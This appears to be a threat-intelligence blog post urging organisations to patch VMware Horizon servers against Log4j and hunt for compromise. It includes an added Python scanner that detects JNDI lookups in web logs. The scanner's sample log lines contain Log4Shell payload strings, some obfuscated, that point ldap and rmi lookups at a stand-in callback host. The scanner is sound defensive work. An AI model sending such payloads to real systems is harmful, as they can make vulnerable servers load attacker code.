Corvus Threat Intel
Did you already forget about Log4j? Well, threat actors haven’t.
Cybercriminals have continued to exploit vulnerable VMware Horizon and Unified Access Gateway servers that did not apply patches or workarounds for Log4j (CVE-2021-44228).
This includes suspected state-sponsored APT groups as well as ransomware operators. Yesterday’s 0-day is today’s compromise.
Organizations employing the affected systems should immediately apply the vendor-recommended patches or utilize temporary workarounds if unable to update right away.
- (See VMware security advisory: https://www.vmware.com/security/advisories/VMSA-2021-0028.html)
As always, ensure proper backup cadence.
CISA recommends that all organizations with affected systems that did not immediately apply available patches or workarounds assume compromise and initiate threat hunting activities using the IOCs provided in its CSA (https://www.cisa.gov/uscert/ncas/alerts/aa22-174a).
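As an added illustration of the threat-hunting step above (example code, not from Corvus or from CISA's advisory): a small Python scanner that unwraps the nested lookup obfuscations public Log4Shell detection rules account for, then flags web-server log lines carrying a JNDI lookup. The log lines and the 203.0.113.5 callback host are constructed for the example.

```python
import re

# Constructed sample web-server log lines (not from the page or the CISA advisory);
# 203.0.113.0/24 is the RFC 5737 documentation range standing in for a callback host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [18/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - [18/Jun/2022:10:01:09 +0000] "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [18/Jun/2022:10:02:00 +0000] "GET /portal/?q=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/c} HTTP/1.1" 404 0 "-" "-"',
]

# Nested lookups that public detection rules unwrap before matching:
# ${lower:x} / ${upper:x} and the default-value form ${...:-x} (e.g. ${::-x}, ${env:NAME:-x}).
_INNER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*?:-([^{}]*)\}", re.IGNORECASE)
# The lookup itself, once unwrapped: ${jndi:<scheme>://<target>
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups, innermost first, until nothing changes.

    Case from ${lower:}/${upper:} is left as written because matching below is
    case-insensitive anyway; max_rounds bounds the work on pathological input.
    """
    for _ in range(max_rounds):
        unwrapped = _INNER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if unwrapped == text:
            return text
        text = unwrapped
    return text


def scan(lines):
    """Return (line_number, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


if __name__ == "__main__":
    for number, scheme, target in scan(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup via {scheme} -> {target}")
```

The scheme and target returned for each hit are what you would pivot on next: outbound connections to that host from the Horizon or UAG server are the confirmation that the attempt succeeded.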
This blog post and its contents are intended for general guidance and informational purposes only. This blog post is under no circumstances intended to be used or considered as specific insurance or information security advice.